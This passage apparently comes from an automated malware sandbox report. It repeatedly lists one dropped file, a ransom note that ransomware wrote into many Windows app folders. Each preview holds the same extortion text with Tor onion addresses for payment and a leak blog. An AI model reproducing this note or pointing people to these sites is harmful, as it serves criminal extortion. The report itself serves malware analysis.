                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
